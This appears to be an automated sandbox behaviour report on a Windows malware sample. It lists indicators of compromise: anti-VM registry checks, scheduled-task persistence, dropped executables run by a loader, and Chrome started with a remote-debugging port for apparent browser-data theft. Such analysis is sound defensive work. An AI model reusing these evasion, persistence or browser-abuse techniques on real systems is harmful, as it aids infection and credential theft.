\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 151f9773d5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebp51gY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5e812bac6f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 36c0490467.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5fdc363345.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5a3fcf8817.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8QQOJj9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5f8da7bbdafaed3095a2fef9f7caf45c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d7efae0799.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9222c12528.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ftS1RPn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language video.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language agndts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MAl7pjE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ftS1RPn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DF9PCFR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7nSTXG6.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString e984a62c31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7nSTXG6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 e984a62c31.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 5968 timeout.exe 2340 timeout.exe -
Enumerates system info in registry 2 TTPs 19 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 5984 taskkill.exe 2256 taskkill.exe 5892 taskkill.exe 4028 taskkill.exe 2132 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133846840713254520" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5440 schtasks.exe 2612 schtasks.exe 3612 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3336 7tzlyz8.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1192 5f8da7bbdafaed3095a2fef9f7caf45c.exe 1192 5f8da7bbdafaed3095a2fef9f7caf45c.exe 3976 skotes.exe 3976 skotes.exe 4828 MAl7pjE.exe 4828 MAl7pjE.exe 4828 MAl7pjE.exe 4828 MAl7pjE.exe 4828 MAl7pjE.exe 4828 MAl7pjE.exe 4528 lwtLxxH.exe 4528 lwtLxxH.exe 1560 7nSTXG6.exe 1560 7nSTXG6.exe 1560 7nSTXG6.exe 1560 7nSTXG6.exe 3696 ebp51gY.exe 3696 ebp51gY.exe 1560 7nSTXG6.exe 1560 7nSTXG6.exe 3696 ebp51gY.exe 3696 ebp51gY.exe 3696 ebp51gY.exe 3696 ebp51gY.exe 4528 lwtLxxH.exe 4528 lwtLxxH.exe 3692 chrome.exe 3692 chrome.exe 1112 ftS1RPn.exe 1112 ftS1RPn.exe 4528 lwtLxxH.exe 5000 8QQOJj9.exe 5000 8QQOJj9.exe 5000 8QQOJj9.exe 5000 8QQOJj9.exe 5000 8QQOJj9.exe 5000 8QQOJj9.exe 1560 7nSTXG6.exe 1560 7nSTXG6.exe 3372 uXivbut.exe 3372 uXivbut.exe 548 chrome.exe 548 chrome.exe 4072 Gxtuum.exe 4072 Gxtuum.exe 1560 7nSTXG6.exe 1560 7nSTXG6.exe 1104 e521e66b6b.exe 1104 e521e66b6b.exe 1104 e521e66b6b.exe 1560 7nSTXG6.exe 1560 7nSTXG6.exe 2972 msedge.exe 2972 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4984 msedge.exe 4984 msedge.exe 1236 video.exe 1236 video.exe 5012 skotes.exe 5012 skotes.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
pid Process 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe 6072 chrome.exe 6072 chrome.exe 6072 chrome.exe 548 msedge.exe 548 msedge.exe 548 msedge.exe 548 msedge.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 4528 lwtLxxH.exe Token: SeShutdownPrivilege 3692 chrome.exe Token: SeCreatePagefilePrivilege 3692 chrome.exe Token: SeShutdownPrivilege 3692 chrome.exe Token: SeCreatePagefilePrivilege 3692 chrome.exe Token: SeShutdownPrivilege 3692 chrome.exe Token: SeCreatePagefilePrivilege 3692 chrome.exe Token: SeShutdownPrivilege 548 chrome.exe Token: SeCreatePagefilePrivilege 548 chrome.exe Token: SeShutdownPrivilege 548 chrome.exe Token: SeCreatePagefilePrivilege 548 chrome.exe Token: SeShutdownPrivilege 548 chrome.exe Token: SeCreatePagefilePrivilege 548 chrome.exe Token: SeShutdownPrivilege 548 chrome.exe Token: SeCreatePagefilePrivilege 548 chrome.exe Token: SeShutdownPrivilege 548 chrome.exe Token: SeCreatePagefilePrivilege 548 chrome.exe Token: SeShutdownPrivilege 548 chrome.exe Token: SeCreatePagefilePrivilege 548 chrome.exe Token: SeDebugPrivilege 1104 e521e66b6b.exe Token: SeDebugPrivilege 3336 7tzlyz8.exe Token: SeDebugPrivilege 3336 7tzlyz8.exe Token: SeDebugPrivilege 5516 powershell.exe Token: SeDebugPrivilege 5216 powershell.exe Token: SeDebugPrivilege 4048 powershell.exe Token: SeDebugPrivilege 6088 TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE Token: SeDebugPrivilege 5896 powershell.exe Token: SeDebugPrivilege 5160 powershell.exe Token: SeShutdownPrivilege 6072 chrome.exe Token: SeCreatePagefilePrivilege 6072 chrome.exe Token: SeShutdownPrivilege 6072 chrome.exe Token: SeCreatePagefilePrivilege 6072 chrome.exe Token: SeDebugPrivilege 5984 taskkill.exe Token: SeShutdownPrivilege 6072 chrome.exe Token: SeCreatePagefilePrivilege 6072 chrome.exe Token: SeShutdownPrivilege 6072 chrome.exe Token: SeCreatePagefilePrivilege 6072 chrome.exe Token: SeDebugPrivilege 2256 taskkill.exe Token: SeDebugPrivilege 5892 taskkill.exe Token: SeDebugPrivilege 4028 taskkill.exe Token: SeDebugPrivilege 748 powershell.exe Token: SeDebugPrivilege 2132 taskkill.exe Token: SeDebugPrivilege 2156 firefox.exe Token: SeDebugPrivilege 2156 firefox.exe Token: SeDebugPrivilege 5108 AddInProcess32.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1192 5f8da7bbdafaed3095a2fef9f7caf45c.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 3692 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 548 chrome.exe 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe -
Suspicious use of SendNotifyMessage 38 IoCs
pid Process 5324 36c0490467.exe 5324 36c0490467.exe 5324 36c0490467.exe 5184 151f9773d5.exe 5184 151f9773d5.exe 5184 151f9773d5.exe 5184 151f9773d5.exe 5184 151f9773d5.exe 5184 151f9773d5.exe 4992 5e812bac6f.exe 4992 5e812bac6f.exe 4992 5e812bac6f.exe 5184 151f9773d5.exe 5184 151f9773d5.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 2156 firefox.exe 5184 151f9773d5.exe 5184 151f9773d5.exe 5184 151f9773d5.exe 5184 151f9773d5.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3336 7tzlyz8.exe 2156 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1192 wrote to memory of 3976 1192 5f8da7bbdafaed3095a2fef9f7caf45c.exe 87 PID 1192 wrote to memory of 3976 1192 5f8da7bbdafaed3095a2fef9f7caf45c.exe 87 PID 1192 wrote to memory of 3976 1192 5f8da7bbdafaed3095a2fef9f7caf45c.exe 87 PID 3976 wrote to memory of 4828 3976 skotes.exe 88 PID 3976 wrote to memory of 4828 3976 skotes.exe 88 PID 3976 wrote to memory of 4828 3976 skotes.exe 88 PID 3976 wrote to memory of 4528 3976 skotes.exe 90 PID 3976 wrote to memory of 4528 3976 skotes.exe 90 PID 3976 wrote to memory of 1560 3976 skotes.exe 91 PID 3976 wrote to memory of 1560 3976 skotes.exe 91 PID 3976 wrote to memory of 1560 3976 skotes.exe 91 PID 3976 wrote to memory of 3696 3976 skotes.exe 92 PID 3976 wrote to memory of 3696 3976 skotes.exe 92 PID 3976 wrote to memory of 3696 3976 skotes.exe 92 PID 1560 wrote to memory of 3692 1560 7nSTXG6.exe 93 PID 1560 wrote to memory of 3692 1560 7nSTXG6.exe 93 PID 3692 wrote to memory of 540 3692 chrome.exe 94 PID 3692 wrote to memory of 540 3692 chrome.exe 94 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 3900 3692 chrome.exe 95 PID 3692 wrote to memory of 1668 3692 chrome.exe 96 PID 3692 wrote to memory of 1668 3692 chrome.exe 96 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 PID 3692 wrote to memory of 3876 3692 chrome.exe 97 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5f8da7bbdafaed3095a2fef9f7caf45c.exe"C:\Users\Admin\AppData\Local\Temp\5f8da7bbdafaed3095a2fef9f7caf45c.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4828
-
-
C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa0dbdcc40,0x7ffa0dbdcc4c,0x7ffa0dbdcc585⤵PID:540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1896,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:25⤵PID:3900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2052,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2112 /prefetch:35⤵PID:1668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2480 /prefetch:85⤵PID:3876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3156 /prefetch:15⤵
- Uses browser remote debugging
PID:4732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3328 /prefetch:15⤵
- Uses browser remote debugging
PID:4248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4252 /prefetch:15⤵
- Uses browser remote debugging
PID:1596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4648 /prefetch:85⤵PID:2428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4644 /prefetch:85⤵PID:1660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,5642963431153094860,18179726554472075592,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4708 /prefetch:85⤵PID:5000
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:548 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa2100cc40,0x7ffa2100cc4c,0x7ffa2100cc585⤵PID:1520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1916 /prefetch:25⤵PID:3588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2180 /prefetch:35⤵PID:436
-
-
